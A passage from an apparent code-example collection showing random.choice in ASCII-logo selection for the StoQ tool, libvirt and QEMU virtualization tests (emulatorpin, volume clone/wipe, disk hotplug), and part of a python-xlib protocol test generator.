    |S.--. ||T.--. ||O.--. ||Q.--. |
    | :/\: || :/\: || :/\: || (\/) |
    | :\/: || (__) || :\/: || :\/: |
    | '--'S|| '--'T|| '--'O|| '--'Q|
    `------'`------'`------'`------'

          Analysis. Simplified.
                 v{}
    """.format(__version__))

    logo.append("""
          *******                               * ***
        *       ***      *                    *  ****
       *         **     **                   *  *  ***
       **        *      **                  *  **   ***
        ***           ********    ****     *  ***    ***
       ** ***        ********    * ***  * **   **     **
        *** ***         **      *   ****  **   **     **
          *** ***       **     **    **   **   **     **
            *** ***     **     **    **   **   **     **
              ** ***    **     **    **   **   **     **
               ** **    **     **    **    **  ** *** **
                * *     **     **    **     ** *   ****
      ***        *      **      ******       ***     ***
     *  *********        **      ****         ******* **
    *     *****                                 ***   **
    *                                                 **
     **                                               *
                                                     *
                                                    *
                    Analysis. Simplified.
                          v{}
    """.format(__version__))

    logo.append("""
     .d8888b.  888             .d88888b.
    d88P  Y88b 888            d88P" "Y88b
    Y88b.      888            888     888
     "Y888b.   888888 .d88b.  888     888
        "Y88b. 888   d88""88b 888     888
          "888 888   888  888 888 Y8b 888
    Y88b  d88P Y88b. Y88..88P Y88b.Y8b88P
     "Y8888P"   "Y888 "Y88P"   "Y888888"
                                     Y8b
            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
     _______ _______  _____   _____
     |______    |    |     | |   __|
     ______|    |    |_____| |____\|

           Analysis. Simplified.
                 v{}
    """.format(__version__))

    logo.append("""
      .--.--.       ___                  ,----..
     /  /    '.   ,--.'|_               /   /   '
    |  :  /`. /   |  | :,'    ,---.    /   .     :
    ;  |  |--`    :  : ' :   '   ,'\  .   /   ;.  '
    |  :  ;_    .;__,'  /   /   /   |.   ;   /  ` ;
     \  \    `. |  |   |   .   ; ,. :;   |  ; \ ; |
      `----.   \:__,'| :   '   | |: :|   :  | ; | '
      __ \  \  |  '  : |__ '   | .; :.   |  ' ' ' :
     /  /`--'  /  |  | '.'||   :    |'   ;  \; /  |
    '--'.     /   ;  :    ; \   \  /  \   \  ',  . "
      `--'---'    |  ,   /   `----'    ;   :      ; |
                   ---`-'               \   \ .'`--"
                                         `---`
                Analysis. Simplified.
                      v{}
    """.format(__version__))

    logo.append("""
     _______ _________ _______  _______
    (  ____ \\__   __/(  ___  )(  ___  )
    | (    \/   ) (   | (   ) || (   ) |
    | (_____    | |   | |   | || |   | |
    (_____  )   | |   | |   | || |   | |
          ) |   | |   | |   | || | /\| |
    /\____) |   | |   | (___) || (_\ \ |
    \_______)   )_(   (_______)(____\/_)

            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
      _________  __          ________
     /   _____/_/  |_  ____  \_____  -
     \_____  \ \   __\/  _ \  /  / \  -
     /        \ |  | (  <_> )/   \_/.  -
    /_______  / |__|  \____/ \_____\ \_/
            \/                      \__>

            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
               ___
              (   )
        .--.   | |_      .--.    .--.
      /  _  \ (   __)   /    \  /    "
     . .' `. ; | |     |  .-. ;|  .-. '
     | '   | | | | ___ | |  | || |  | |
     _\_`.(___)| |(   )| |  | || |  | |
    (   ). '.  | | | | | |  | || |  | |
     | |  `\ | | ' | | | '  | || '  | |
     ; '._,' ' ' `-' ; '  `-' /' `-'  |
      '.___.'   `.__.   `.__.'  `._ / |
                                    | |
                                   (___)

            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
    ███████╗████████╗ ██████╗  ██████╗
    ██╔════╝╚══██╔══╝██╔═══██╗██╔═══██╗
    ███████╗   ██║   ██║   ██║██║   ██║
    ╚════██║   ██║   ██║   ██║██║▄▄ ██║
    ███████║   ██║   ╚██████╔╝╚██████╔╝
    ╚══════╝   ╚═╝    ╚═════╝  ╚══▀▀═╝

           Analysis. Simplified.
                 v{}
    """.format(__version__))

    logo.append("""
     ▄████████     ███      ▄██████▄  ████████▄
    ███    ███ ▀█████████▄ ███    ███ ███    ███
    ███    █▀     ▀███▀▀██ ███    ███ ███    ███
    ███            ███   ▀ ███    ███ ███    ███
    ▀███████████   ███     ███    ███ ███    ███
             ███   ███     ███    ███ ███    ███
       ▄█    ███   ███     ███    ███ ███  ▀ ███
     ▄████████▀   ▄████▀    ▀██████▀   ▀██████▀▄█

                   Analysis. Simplified.
                         v{}
    """.format(__version__))

    sys.stdout.flush()
    try:
        print(random.choice(logo))
    # bug fix: the original bare 'except:' also swallowed KeyboardInterrupt
    # and SystemExit; Exception keeps the intended fallback behavior while
    # letting those propagate
    except Exception:
        print(logo[3])
    sys.stdout.flush()

Example 39

Project: tp-libvirt
Source File: virsh_emulatorpin.py
View license
def run(test, params, env):
    """
    Test emulatorpin tuning

    1) Positive testing
       1.1) get the current emulatorpin parameters for a running/shutoff guest
       1.2) set the current emulatorpin parameters for a running/shutoff guest
    2) Negative testing
       2.1) get emulatorpin parameters for a running/shutoff guest
       2.2) set emulatorpin parameters running/shutoff guest
    """

    # Run test case
    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)
    cgconfig = params.get("cgconfig", "on")
    cpulist = params.get("emulatorpin_cpulist")
    status_error = params.get("status_error", "no")
    change_parameters = params.get("change_parameters", "no")

    # Backup original vm
    vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    vmxml_backup = vmxml.copy()

    emulatorpin_placement = params.get("emulatorpin_placement", "")
    if emulatorpin_placement:
        vm.destroy()
        vmxml.placement = emulatorpin_placement
        vmxml.sync()
        try:
            vm.start()
        except VMStartError, detail:
            # Recover the VM and failout early
            vmxml_backup.sync()
            logging.debug("Used VM XML:\n %s", vmxml)
            raise error.TestFail("VM Fails to start: %s", detail)

    test_dicts = dict(params)
    test_dicts['vm'] = vm

    host_cpus = utils.count_cpus()
    test_dicts['host_cpus'] = host_cpus
    cpu_max = int(host_cpus) - 1

    cpu_list = None

    # Assemble cpu list for positive test
    if status_error == "no":
        if cpulist is None:
            pass
        elif cpulist == "x":
            cpulist = random.choice(utils.cpu_online_map())
        elif cpulist == "x-y":
            # By default, emulator is pined to all cpus, and element
            # 'cputune/emulatorpin' may not exist in VM's XML.
            # And libvirt will do nothing if pin emulator to the same
            # cpus, that means VM's XML still have that element.
            # So for testing, we should avoid that value(0-$cpu_max).
            if cpu_max < 2:
                cpulist = "0-0"
            else:
                cpulist = "0-%s" % (cpu_max - 1)
        elif cpulist == "x,y":
            cpulist = ','.join(random.sample(utils.cpu_online_map(), 2))
        elif cpulist == "x-y,^z":
            cpulist = "0-%s,^%s" % (cpu_max, cpu_max)
        elif cpulist == "-1":
            cpulist = "-1"
        elif cpulist == "out_of_max":
            cpulist = str(cpu_max + 1)
        else:
            raise error.TestNAError("CPU-list=%s is not recognized."
                                    % cpulist)
    test_dicts['emulatorpin_cpulist'] = cpulist
    if cpulist:
        cpu_list = cpus_parser(cpulist)
        test_dicts['cpu_list'] = cpu_list
        logging.debug("CPU list is %s", cpu_list)

    cg = utils_cgroup.CgconfigService()

    if cgconfig == "off":
        if cg.cgconfig_is_running():
            cg.cgconfig_stop()

    # positive and negative testing #########
    try:
        if status_error == "no":
            if change_parameters == "no":
                get_emulatorpin_parameter(test_dicts)
            else:
                set_emulatorpin_parameter(test_dicts)

        if status_error == "yes":
            if change_parameters == "no":
                get_emulatorpin_parameter(test_dicts)
            else:
                set_emulatorpin_parameter(test_dicts)
    finally:
        # Recover cgconfig and libvirtd service
        if not cg.cgconfig_is_running():
            cg.cgconfig_start()
            utils_libvirtd.libvirtd_restart()
        # Recover vm.
        vmxml_backup.sync()

Example 40

Project: tp-libvirt
Source File: virsh_vol_clone_wipe.py
View license
def run(test, params, env):
    """
    This test cover two volume commands: vol-clone and vol-wipe.

    1. Create a given type pool.
    2. Create a given format volume in the pool.
    3. Clone the new create volume.
    4. Wipe the new clone volume.
    5. Delete the volume and pool.

    :param test: test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment
    """

    pool_name = params.get("pool_name")
    pool_type = params.get("pool_type")
    pool_target = params.get("pool_target")
    # Relative targets are placed under the test's temporary directory
    if not os.path.dirname(pool_target):
        pool_target = os.path.join(test.tmpdir, pool_target)
    emulated_image = params.get("emulated_image")
    emulated_image_size = params.get("emulated_image_size")
    vol_name = params.get("vol_name")
    new_vol_name = params.get("new_vol_name")
    vol_capability = params.get("vol_capability")
    vol_format = params.get("vol_format")
    clone_option = params.get("clone_option", "")
    wipe_algorithms = params.get("wipe_algorithms")

    # Skip if the installed virsh lacks the requested clone option
    if virsh.has_command_help_match("vol-clone", "--prealloc-metadata") is None:
        if "prealloc-metadata" in clone_option:
            raise error.TestNAError("Option --prealloc-metadata "
                                    "is not supported.")

    clone_status_error = "yes" == params.get("clone_status_error", "no")
    wipe_status_error = "yes" == params.get("wipe_status_error", "no")
    setup_libvirt_polkit = "yes" == params.get("setup_libvirt_polkit")

    # libvirt acl polkit related params
    uri = params.get("virsh_uri")
    unpri_user = params.get('unprivileged_user')
    if unpri_user:
        if unpri_user.count('EXAMPLE'):
            unpri_user = 'testacl'

    if not libvirt_version.version_compare(1, 1, 1):
        if setup_libvirt_polkit:
            raise error.TestNAError("API acl test not supported in current"
                                    " libvirt version.")

    # Using algorithms other than zero need scrub installed.
    try:
        utils_path.find_command('scrub')
    except utils_path.CmdNotFoundError:
        logging.warning("Can't locate scrub binary, only 'zero' algorithm "
                        "is used.")
        valid_algorithms = ["zero"]
    else:
        valid_algorithms = ["zero", "nnsa", "dod", "bsi", "gutmann",
                            "schneier", "pfitzner7", "pfitzner33", "random"]

    # Choose an algorithm randomly
    if wipe_algorithms:
        alg = random.choice(wipe_algorithms.split())
    else:
        alg = random.choice(valid_algorithms)

    libvirt_pvt = utlv.PoolVolumeTest(test, params)
    libvirt_pool = libvirt_storage.StoragePool()
    if libvirt_pool.pool_exists(pool_name):
        raise error.TestError("Pool '%s' already exist" % pool_name)
    try:
        # Create a new pool
        disk_vol = []
        if pool_type == 'disk':
            disk_vol.append(params.get("pre_vol", '10M'))
        libvirt_pvt.pre_pool(pool_name=pool_name,
                             pool_type=pool_type,
                             pool_target=pool_target,
                             emulated_image=emulated_image,
                             image_size=emulated_image_size,
                             pre_disk_vol=disk_vol)

        libvirt_vol = libvirt_storage.PoolVolume(pool_name)
        # Create a new volume
        if vol_format in ['raw', 'qcow2', 'qed', 'vmdk']:
            libvirt_pvt.pre_vol(vol_name=vol_name,
                                vol_format=vol_format,
                                capacity=vol_capability,
                                allocation=None,
                                pool_name=pool_name)
        elif vol_format == 'partition':
            # Disk pools expose existing partitions as volumes
            vol_name = utlv.get_vol_list(pool_name).keys()[0]
            logging.debug("Find partition %s in disk pool", vol_name)
        elif vol_format == 'sparse':
            # Create a sparse file in pool
            sparse_file = pool_target + '/' + vol_name
            cmd = "dd if=/dev/zero of=" + sparse_file
            cmd += " bs=1 count=0 seek=" + vol_capability
            utils.run(cmd)
        else:
            raise error.TestError("Unknown volume format %s" % vol_format)

        # Refresh the pool
        virsh.pool_refresh(pool_name, debug=True)
        vol_info = libvirt_vol.volume_info(vol_name)
        if not vol_info:
            raise error.TestError("Fail to get info of volume %s" % vol_name)

        for key in vol_info:
            logging.debug("Original volume info: %s = %s", key, vol_info[key])

        # Metadata preallocation is not support for block volume
        if vol_info["Type"] == "block" and clone_option.count("prealloc-metadata"):
            clone_status_error = True

        if pool_type == "disk":
            new_vol_name = utlv.new_disk_vol_name(pool_name)
            if new_vol_name is None:
                raise error.TestError("Fail to generate volume name")
            # update polkit rule as the volume name changed
            if setup_libvirt_polkit:
                vol_pat = r"lookup\('vol_name'\) == ('\S+')"
                new_value = "lookup('vol_name') == '%s'" % new_vol_name
                utlv.update_polkit_rule(params, vol_pat, new_value)

        # Clone volume
        clone_result = virsh.vol_clone(vol_name, new_vol_name, pool_name,
                                       clone_option, debug=True)
        if not clone_status_error:
            if clone_result.exit_status != 0:
                raise error.TestFail("Clone volume fail:\n%s" %
                                     clone_result.stderr.strip())
            else:
                vol_info = libvirt_vol.volume_info(new_vol_name)
                for key in vol_info:
                    logging.debug("Cloned volume info: %s = %s", key,
                                  vol_info[key])
                logging.debug("Clone volume successfully.")
                # Wipe the new clone volume
                if alg:
                    logging.debug("Wiping volume by '%s' algorithm", alg)
                wipe_result = virsh.vol_wipe(new_vol_name, pool_name, alg,
                                             unprivileged_user=unpri_user,
                                             uri=uri, debug=True)
                unsupported_err = ["Unsupported algorithm",
                                   "no such pattern sequence"]
                if not wipe_status_error:
                    if wipe_result.exit_status != 0:
                        if any(err in wipe_result.stderr for err in unsupported_err):
                            raise error.TestNAError(wipe_result.stderr)
                        # BUGFIX: report the wipe command's stderr, not the
                        # (successful) clone command's stdout.
                        raise error.TestFail("Wipe volume fail:\n%s" %
                                             wipe_result.stderr.strip())
                    else:
                        virsh_vol_info = libvirt_vol.volume_info(new_vol_name)
                        for key in virsh_vol_info:
                            logging.debug("Wiped volume info(virsh): %s = %s",
                                          key, virsh_vol_info[key])
                        vol_path = virsh.vol_path(new_vol_name,
                                                  pool_name).stdout.strip()
                        qemu_vol_info = utils_misc.get_image_info(vol_path)
                        for key in qemu_vol_info:
                            logging.debug("Wiped volume info(qemu): %s = %s",
                                          key, qemu_vol_info[key])
                            # A wiped volume must read back as raw data
                            if qemu_vol_info['format'] != 'raw':
                                raise error.TestFail("Expect wiped volume "
                                                     "format is raw")
                elif wipe_status_error and wipe_result.exit_status == 0:
                    raise error.TestFail("Expect wipe volume fail, but run"
                                         " successfully.")
        elif clone_status_error and clone_result.exit_status == 0:
            raise error.TestFail("Expect clone volume fail, but run"
                                 " successfully.")
    finally:
        # Clean up
        try:
            libvirt_pvt.cleanup_pool(pool_name, pool_type, pool_target,
                                     emulated_image)
        except error.TestFail, detail:
            logging.error(str(detail))

Example 41

View license
@error.context_aware
def run(test, params, env):
    """
    This tests the disk hotplug/unplug functionality.
    1) prepares multiple disks to be hotplugged
    2) hotplugs them
    3) verifies that they are in qtree/guest system/...
    4) stop I/O stress_cmd
    5) unplugs them
    6) continue I/O stress_cmd
    7) verifies they are not in qtree/guest system/...
    8) repeats $repeat_times

    :param test: QEMU test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.
    """
    def verify_qtree(params, info_qtree, info_block, proc_scsi, qdev):
        """
        Verifies that params, info qtree, info block and /proc/scsi/ matches
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :param info_qtree: Output of "info qtree" monitor command
        :type info_qtree: string
        :param info_block: Output of "info block" monitor command
        :type info_block: dict of dicts
        :param proc_scsi: Output of "/proc/scsi/scsi" guest file
        :type proc_scsi: string
        :param qdev: qcontainer representation
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        """
        err = 0
        qtree = qemu_qtree.QtreeContainer()
        qtree.parse_info_qtree(info_qtree)
        disks = qemu_qtree.QtreeDisksContainer(qtree.get_nodes())
        # Each check accumulates its error count into err
        (tmp1, tmp2) = disks.parse_info_block(info_block)
        err += tmp1 + tmp2
        err += disks.generate_params()
        err += disks.check_disk_params(params)
        (tmp1, tmp2, _, _) = disks.check_guests_proc_scsi(proc_scsi)
        err += tmp1 + tmp2
        if err:
            logging.error("info qtree:\n%s", info_qtree)
            logging.error("info block:\n%s", info_block)
            logging.error("/proc/scsi/scsi:\n%s", proc_scsi)
            logging.error(qdev.str_bus_long())
            raise error.TestFail("%s errors occurred while verifying"
                                 " qtree vs. params" % err)

    def insert_into_qdev(qdev, param_matrix, no_disks, params, new_devices):
        """
        Inserts no_disks disks int qdev using randomized args from param_matrix
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param param_matrix: Matrix of randomizable params
        :type param_matrix: list of lists
        :param no_disks: Desired number of disks
        :type no_disks: integer
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :param new_devices: Per-queue lists to be filled with the new devices
        :type new_devices: list of lists
        :return: (newly added devices, number of added disks)
        :rtype: tuple(list, integer)
        """
        dev_idx = 0
        _new_devs_fmt = ""
        _formats = param_matrix.pop('fmt', [params.get('drive_format')])
        formats = _formats[:]
        # Strict bus/addr assignment is only needed for parallel hotplug
        if len(new_devices) == 1:
            strict_mode = None
        else:
            strict_mode = True
        i = 0
        while i < no_disks:
            # Set the format
            if len(formats) < 1:
                if i == 0:
                    raise error.TestError("Fail to add any disks, probably bad"
                                          " configuration.")
                logging.warn("Can't create desired number '%s' of disk types "
                             "'%s'. Using '%d' no disks.", no_disks,
                             _formats, i)
                break
            name = 'stg%d' % i
            args = {'name': name, 'filename': stg_image_name % i}
            fmt = random.choice(formats)
            if fmt == 'virtio_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'virtio-scsi-pci'
            elif fmt == 'lsi_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'lsi53c895a'
            elif fmt == 'spapr_vscsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'spapr-vscsi'
            else:
                args['fmt'] = fmt
            # Other params
            for key, value in param_matrix.iteritems():
                args[key] = random.choice(value)

            # BUGFIX: initialize devs before the try block; if
            # images_define_by_variables itself raises DeviceError, the
            # except branch would otherwise hit a NameError on 'devs'.
            devs = []
            try:
                devs = qdev.images_define_by_variables(**args)
                # parallel test adds devices in mixed order, force bus/addrs
                qdev.insert(devs, strict_mode)
            except utils.DeviceError:
                # Roll back partial insertion and retry with another format
                for dev in devs:
                    if dev in qdev:
                        qdev.remove(dev, recursive=True)
                formats.remove(fmt)
                continue

            params = convert_params(params, args)
            env_process.preprocess_image(test, params.object_params(name),
                                         name)
            # Distribute devices round-robin over the hotplug queues
            new_devices[dev_idx].extend(devs)
            dev_idx = (dev_idx + 1) % len(new_devices)
            _new_devs_fmt += "%s(%s) " % (name, fmt)
            i += 1
        if _new_devs_fmt:
            logging.info("Using disks: %s", _new_devs_fmt[:-1])
        param_matrix['fmt'] = _formats
        return new_devices, params

    def _hotplug(new_devices, monitor, prefix=""):
        """
        Do the actual hotplug of the new_devices using monitor monitor.
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        :param prefix: Thread-name prefix used in log messages
        :type prefix: string
        """
        hotplug_outputs = []
        hotplug_sleep = float(params.get('wait_between_hotplugs', 0))
        for device in new_devices:      # Hotplug all devices
            time.sleep(hotplug_sleep)
            hotplug_outputs.append(device.hotplug(monitor))
        time.sleep(hotplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in new_devices:      # Verify the hotplug status
            out = hotplug_outputs.pop(0)
            out = device.verify_hotplug(out, monitor)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))
        if not failed and not unverif:
            logging.debug("%sAll hotplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sHotplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sHotplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sHotplug of some devices failed." % prefix)

    def hotplug_serial(new_devices, monitor):
        # Serial variant: single queue, single monitor
        _hotplug(new_devices[0], monitor)

    def hotplug_parallel(new_devices, monitors):
        # Parallel variant: one thread per queue/monitor pair
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_hotplug, name=name[:-2],
                                      args=(new_devices[i], monitors[i], name))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def _postprocess_images():
        # remove and check the stg* images; keep the rest in params['images']
        _disks = []
        for disk in params['images'].split(' '):
            if disk.startswith("stg"):
                env_process.postprocess_image(test, params.object_params(disk),
                                              disk)
            else:
                _disks.append(disk)
        # BUGFIX: join once after the loop instead of on every iteration
        params['images'] = " ".join(_disks)

    def _unplug(new_devices, qdev, monitor, prefix=""):
        """
        Do the actual unplug of new_devices using monitor monitor
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        :param prefix: Thread-name prefix used in log messages
        :type prefix: string
        """
        unplug_sleep = float(params.get('wait_between_unplugs', 0))
        unplug_outs = []
        unplug_devs = []
        for device in new_devices[::-1]:    # unplug all devices
            if device in qdev:  # Some devices are removed with previous one
                time.sleep(unplug_sleep)
                unplug_devs.append(device)
                unplug_outs.append(device.unplug(monitor))
                # Remove from qdev even when unplug failed because further in
                # this test we compare VM with qdev, which should be without
                # these devices. We can do this because we already set the VM
                # as dirty.
                if LOCK:
                    LOCK.acquire()
                qdev.remove(device)
                if LOCK:
                    LOCK.release()
        time.sleep(unplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in unplug_devs:          # Verify unplugs
            _out = unplug_outs.pop(0)
            # unplug effect can be delayed as it waits for OS response before
            # it removes the device from qtree
            for _ in xrange(50):
                out = device.verify_unplug(_out, monitor)
                if out is True:
                    break
                time.sleep(0.1)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))

        if not failed and not unverif:
            logging.debug("%sAll unplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sUnplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sUnplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sUnplug of some devices failed." % prefix)

    def unplug_serial(new_devices, qdev, monitor):
        # Serial variant: single queue, single monitor
        _unplug(new_devices[0], qdev, monitor)

    def unplug_parallel(new_devices, qdev, monitors):
        # Parallel variant: one thread per queue/monitor pair
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_unplug,
                                      args=(new_devices[i], qdev, monitors[i]))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def verify_qtree_unsupported(params, info_qtree, info_block, proc_scsi,
                                 qdev):
        # Fallback used when the monitor lacks the "info qtree" command
        return logging.warn("info qtree not supported. Can't verify qtree vs. "
                            "guest disks.")

    vm = env.get_vm(params['main_vm'])
    qdev = vm.devices
    session = vm.wait_for_login(timeout=int(params.get("login_timeout", 360)))
    out = vm.monitor.human_monitor_cmd("info qtree", debug=False)
    if "unknown command" in str(out):
        verify_qtree = verify_qtree_unsupported

    stg_image_name = params['stg_image_name']
    if not stg_image_name[0] == "/":
        stg_image_name = "%s/%s" % (data_dir.get_data_dir(), stg_image_name)
    stg_image_num = int(params['stg_image_num'])
    # Re-join params that were split on an escaped (trailing-backslash) space
    stg_params = params.get('stg_params', '').split(' ')
    i = 0
    while i < len(stg_params) - 1:
        if not stg_params[i].strip():
            i += 1
            continue
        if stg_params[i][-1] == '\\':
            stg_params[i] = '%s %s' % (stg_params[i][:-1],
                                       stg_params.pop(i + 1))
        i += 1

    param_matrix = {}
    for i in xrange(len(stg_params)):
        if not stg_params[i].strip():
            continue
        (cmd, parm) = stg_params[i].split(':', 1)
        # ',' separated list of values
        parm = parm.split(',')
        j = 0
        while j < len(parm) - 1:
            # Re-join values that contained an escaped comma
            if parm[j][-1] == '\\':
                parm[j] = '%s,%s' % (parm[j][:-1], parm.pop(j + 1))
            j += 1

        param_matrix[cmd] = parm

    # Modprobe the module if specified in config file
    module = params.get("modprobe_module")
    if module:
        session.cmd("modprobe %s" % module)

    stress_cmd = params.get('stress_cmd')
    if stress_cmd:
        funcatexit.register(env, params.get('type'), stop_stresser, vm,
                            params.get('stress_kill_cmd'))
        stress_session = vm.wait_for_login(timeout=10)
        for _ in xrange(int(params.get('no_stress_cmds', 1))):
            stress_session.sendline(stress_cmd)

    rp_times = int(params.get("repeat_times", 1))
    queues = params.get("multi_disk_type") == "parallel"
    if queues:  # parallel
        queues = xrange(len(vm.monitors))
        hotplug = hotplug_parallel
        unplug = unplug_parallel
        monitor = vm.monitors
        global LOCK
        LOCK = threading.Lock()
    else:   # serial
        queues = xrange(1)
        hotplug = hotplug_serial
        unplug = unplug_serial
        monitor = vm.monitor
    context_msg = "Running sub test '%s' %s"
    error.context("Verify disk before test", logging.info)
    info_qtree = vm.monitor.info('qtree', False)
    info_block = vm.monitor.info_block(False)
    proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
    verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
    for iteration in xrange(rp_times):
        error.context("Hotplugging/unplugging devices, iteration %d"
                      % iteration, logging.info)
        sub_type = params.get("sub_type_before_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Insert devices into qdev", logging.debug)
        qdev.set_dirty()
        new_devices = [[] for _ in queues]
        new_devices, params = insert_into_qdev(qdev, param_matrix,
                                               stg_image_num, params,
                                               new_devices)

        error.context("Hotplug the devices", logging.debug)
        hotplug(new_devices, monitor)
        time.sleep(float(params.get('wait_after_hotplug', 0)))

        error.context("Verify disks after hotplug", logging.debug)
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        qdev.set_clean()

        sub_type = params.get("sub_type_after_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        sub_type = params.get("sub_type_before_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Unplug and remove the devices", logging.debug)
        # Pause I/O stress while the disks go away
        if stress_cmd:
            session.cmd(params["stress_stop_cmd"])
        unplug(new_devices, qdev, monitor)
        if stress_cmd:
            session.cmd(params["stress_cont_cmd"])
        _postprocess_images()

        error.context("Verify disks after unplug", logging.debug)
        time.sleep(float(params.get('wait_after_unplug', 0)))
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        # we verified the unplugs, set the state to 0
        for _ in xrange(qdev.get_state()):
            qdev.set_clean()

        sub_type = params.get("sub_type_after_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

    # Check for various KVM failures
    error.context("Validating VM after all disk hotplug/unplugs",
                  logging.debug)
    vm.verify_alive()
    out = session.cmd_output('dmesg')
    if "I/O error" in out:
        logging.warn(out)
        raise error.TestWarn("I/O error messages occured in dmesg, check"
                             "the log for details.")

Example 42

Project: python-xlib
Source File: genprottest.py
View license
def gen_func(fc, funcname, structname, outputname, pydef, cdef, vardefs):
    """Emit a C test function that fills an X protocol structure with
    known data, and return the matching Python-side argument values.

    fc         -- open file object receiving the generated C code
    funcname   -- name of the C function to generate
    structname -- C struct type name (e.g. 'xGetKeyboardControlReply')
    outputname -- tag passed to the generated output() call
    pydef      -- python-xlib rq.Struct describing the request/reply
    cdef       -- list of (ctype, fieldname) pairs for the fixed C struct
    vardefs    -- per-variable-field test data, indexed in field order

    Returns a dict mapping python-xlib field names to the values encoded
    into the C data block, so the caller can compare both encodings.
    """
    fc.write('''void %s(void)
    {
      struct {
        %s xstruct;
        ''' % (funcname, structname))

    args = {}        # field name -> python value for the comparison side
    varfs = {}       # field name -> (C init code, length, format)
    extra_vars = []  # extra C variable definitions emitted before the init code
    flags = None     # accumulated value-list mask, if any

    # structure fields etc
    i = 0
    for f in pydef.var_fields:
        #
        # List of something
        #
        if isinstance(f, rq.List):
            #
            # List of short strings
            #
            if f.type is rq.Str:
                vfstrings = vardefs[i]
                vflen = 0
                vfdata = ''
                # On the wire each short string is a length byte + payload.
                for s in vfstrings:
                    vflen = vflen + 1 + len(s)
                    vfdata = vfdata + chr(len(s)) + s

                fc.write('unsigned char %s[%d];\n      '
                         % (f.name, pad4(vflen)))
                varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                                 % (f.name, cstring(vfdata), vflen),
                                 len(vfstrings), 0)
                args[f.name] = vfstrings

            #
            # List of scalars
            #
            elif isinstance(f.type, rq.ScalarObj) \
                 or isinstance(f.type, rq.ResourceObj):

                vflen = vardefs[i]

                # Pick a value range that exercises the upper half of each
                # card size, and the padded C array length for it.
                if f.type.structcode == 'B':
                    rmin = 128
                    rmax = 255
                    deflen = pad4(vflen)
                    ctype = 'CARD8'
                elif f.type.structcode == 'H':
                    rmin = 32768
                    # randint() is inclusive at both ends: 65535, not 65536,
                    # is the largest value a CARD16 can hold.
                    rmax = 65535
                    deflen = vflen + vflen % 2
                    ctype = 'CARD16'
                elif f.type.structcode == 'L':
                    rmin = 65536
                    rmax = 2147483646
                    deflen = vflen
                    ctype = 'CARD32'
                else:
                    # Unknown structcode: fail loudly instead of falling
                    # through with rmin/rmax/ctype undefined.
                    raise RuntimeError('oops: %s' % f.type.structcode)

                # Default arguments bind rmin/rmax now, so the helper keeps
                # this field's range even though the names are reassigned
                # on later loop iterations.
